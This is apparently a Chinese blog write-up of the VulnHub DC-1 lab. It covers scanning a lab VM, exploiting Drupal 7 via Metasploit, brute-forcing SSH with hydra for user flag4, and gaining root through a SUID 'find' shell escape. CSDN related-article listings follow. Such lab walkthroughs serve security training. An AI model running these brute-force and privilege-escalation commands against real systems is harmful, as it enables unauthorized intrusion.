DC1教程

最新推荐文章于 2024-08-27 08:40:03 发布
最新推荐文章于 2024-08-27 08:40:03 发布
阅读量112 收藏
点赞数
分类专栏: DC系列靶场 文章标签: 渗透测试 靶场 DC系列靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44975450/article/details/128285458
版权

Drupal 7命令执行拿shell,find命令提权

arp-scan -l

在这里插入图片描述

masscan -p1-65535 192.168.250.12 --rate=10000

在这里插入图片描述

nmap -sC -sV -p- -A -T4 192.168.250.12

在这里插入图片描述

访问80端口,看到是Drupal,这个cms有很多漏洞,获取版本
在这里插入图片描述

cmseek识别处版本为7
在这里插入图片描述
搜索Draupal 7漏洞

searchsploit Drupal 7

在这里插入图片描述
可以重置密码
在这里插入图片描述
重置管理员后登录
在这里插入图片描述

后台暂无法拿shell
换其他漏洞试一下。网上说有一个命令执行,我们试一下
msf搜索可利用的模块
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
查看home目录
在这里插入图片描述
所有必须先提权到flag4用户。知道用户名后我们知道22端口开放所以爆破ssh

hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.250.12 -vv -f

在这里插入图片描述
ssh登录到flag4用户
在这里插入图片描述
查找可以执行的操作

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

看到有find命令,可以使用find提权

find . -exec /bin/sh ; -quit

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

飞花舞者
关注
专栏目录
斐讯k2刷小米固件_三木大神刷dc1教程
weixin_28765561的博客
01-12 4376
请注意:工具也要更新到新版本,否则可能会出现问题!前期因按过重启按钮的,可能导致固件损坏,必须重新线刷!老版本的,可能无法OTA,也要重新线刷一次。(文中的很多软件已经找不到了,但是大神的思路非常正确,大家可以看看。需要刷机的可以看看我的另一篇)修复诸多问题,现在可以正常使用了!目前功能情况:断电保持功能正常总开关关闭,其他开关同步关闭总开关关闭的情况下,开启其他开关,总开关会打开LOGO灯和总开...
2024年网安最新DC系列靶机1通关教程_dc1 靶机
2401_84298087的博客
05-01 294
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
ESP DC1 插线板固件使用教程
gitblog_00036的博客
08-27 265
ESP DC1 插线板固件使用教程 esp_dc1DC1插线板固件项目地址:https://gitcode.com/gh_mirrors/es/esp_dc1 项目介绍 ESP DC1 是一个基于斐讯 DC1 智能排插的开源固件项目。由于斐讯服务器无法正常访问,该固件旨在通过自定义固件实现插座的联网控制。项目主要功能包括 USB 充电、按键控制、独立接口开关、OTA 在线升级、WEB 配置页面、...
DC系列靶机1通关教程_dc1 靶机(1)
2401_84520332的博客
05-16 286
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
Mongodb数据库教程
joker
03-07 286
Mongodb数据库 内容: mongodb的介绍和安装 mongodb的检点使用 mongodb的增删改查 mongodb的索引操作 mongodb的权限管理 mongodb和python交互 mongodb中文手册 ​ http://www.mongodb.org.cn/manual/ ...
靶场练习 手把手教你通关DC系列 DC1
QYbkx974的博客
07-09 1006
本次使用的kali机的IP地址为DC1的地址为靶场IP地址为: 192.168.243.134开放端口: 22/ssh 80/http 111/rpcbind框架: cms Drupal 7中间件: Apache 2.2.22语言: php 5.4.45操作系统: Debian。
小白实战vulnhub DC1
jelly
06-20 760
来了来了,第一次玩渗透靶机,有点激动,这篇博文主要用于笔记记录作用,有很多不对之处希望得到大家的指教。 环境介绍 靶机:安装在virtualbox上的虚拟机 DC1 192.168.56.102 攻击机:Kali 192.168.56.1 网络配置 鉴于这是第一个靶机,后面的靶机基本都是使用相同的网络配置,这里得说明下网络设置 我对这方面了解也不多,只能说下能让自己能理解通的歪道理。 每次我打开虚拟机时,kali主机就会出现vboxnet0网卡 我理解为在virtualbox中使用这块网卡为其..
DC靶场系列--DC1
BGiscool的博客
06-28 5119
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
Airflow安装教程
程裕强的专栏
10-06 4289
1. 安装python-pip[root@node1 ~]# yum install -y python-pip2. 安装airflow[root@node1 ~]# pip install airflow 如果上面命令安装较慢,可以使用下面命令国内源安装。[root@node1 ~]# pip install -i https://pypi.tuna.tsinghua.edu.cn/simple
Romax软件教程DC1模块-载荷谱分析与处理
"Romax学习资料-DC1模块-载荷谱处理,涵盖了直方图法、当量载荷法和加速测试载荷谱的处理方法,是Romax软件培训教程的一部分,适用于DS-01: Romax Enduro、ND-01: Romax Spectrum、BG-01: Romax Spin和ET-01: Romax ...
DC1_2012.06.tar.gz
07-01
本次工作坊提供的配套资料“DC1_2012.06.tar.gz”是一份宝贵的教育资源,包含了丰富的实例和教程,对于学习和掌握Design Compiler的使用具有极高的价值。 首先,我们需要了解Design Compiler的基本功能。这个工具...
智慧建造总体策划方案(76页).pptx
11-02
智慧建造总体策划方案(76页)
基于 Python2.7 和 PyQT4 开发的 modbus 通信采集软件
11-02
基于 Python2.7 和 PyQT4 开发的 modbus 通信采集软件,已在 windows、deepin linux 和树莓派上测试!
LLC simulink仿真《slx模型文件》
11-02
LLC simulink仿真《slx模型文件》 LLC谐振转换器是一种高效的直流-直流(DC-DC)电源转换器,因其独特的谐振特性而得名。在电力电子领域,LLC仿真对于理解和优化这种转换器的性能至关重要。Simulink是MATLAB环境下的一个强大工具,用于建立和仿真复杂系统,包括电力电子系统。 标题“LLC simulink仿真”指的是使用Simulink进行LLC谐振转换器的建模和仿真。通过Simulink,工程师可以模拟LLC转换器在不同工作条件下的行为,如负载变化、输入电压变动以及控制策略的影响。 **LLC电路的基本原理:** LLC谐振转换器结合了升压(Boost)、降压(Buck)和串联谐振(Series Resonant)三种拓扑结构的特点。它由主开关、副开关、电感、电容和二极管组成。谐振电容和电感形成谐振回路,使得开关器件能在零电压或零电流条件下切换,从而降低开关损耗并提高效率。 **仿真过程:** 在Simulink中,首先需要建立LLC转换器的模型,包括各个元件的参数设定。这包括主开关和副开关的开关频率、谐振电容和电感的值、二极管的反向恢复特性等。然后,设
krb5-devel-1.15.1-55.el7_9.i686.rpm
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh krb5-devel-1.15.1-55.el7_9.i686.rpm
基于Matlab实现Stanley算法项目源码(下载即用)高分项目
11-02
基于Matlab实现Stanley算法项目源码(下载即用)高分项目,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基
ruby-2.0.0.648-39.el7_9.x86_64.rpm
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh ruby-2.0.0.648-39.el7_9.x86_64.rpm
开题报告SpringBoot电子产品销售系统.docx
最新发布
11-02
毕业设计开题报告
蓝牙转串口通讯技术在PC间的数据传输应用
11-02
笔记本电脑通常自带蓝牙模块,而普通的台式PC也可以通过USB蓝牙模块来扩展蓝牙功能。蓝牙转虚拟串口的技术主要依赖于RFCOMM协议,该协议能够仿真RS232串口,包括非数据通路状态的传输。RFCOMM不限制人工速率或步长,并支持两个设备之间的多串口仿真。在Windows系统中,通过设置COM口方式可以实现虚拟串口,这对应的是Bluetooth 2.x的SPP(Serial Port Profile,串口协议)协议。因此,当PC与外部蓝牙模块进行串口通讯时,外部蓝牙模块需要支持SPP协议。笔记本电脑上的蓝牙可以转成虚拟串口,这样基于串口通信的软件就可以实现基于蓝牙无线来进行通信了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值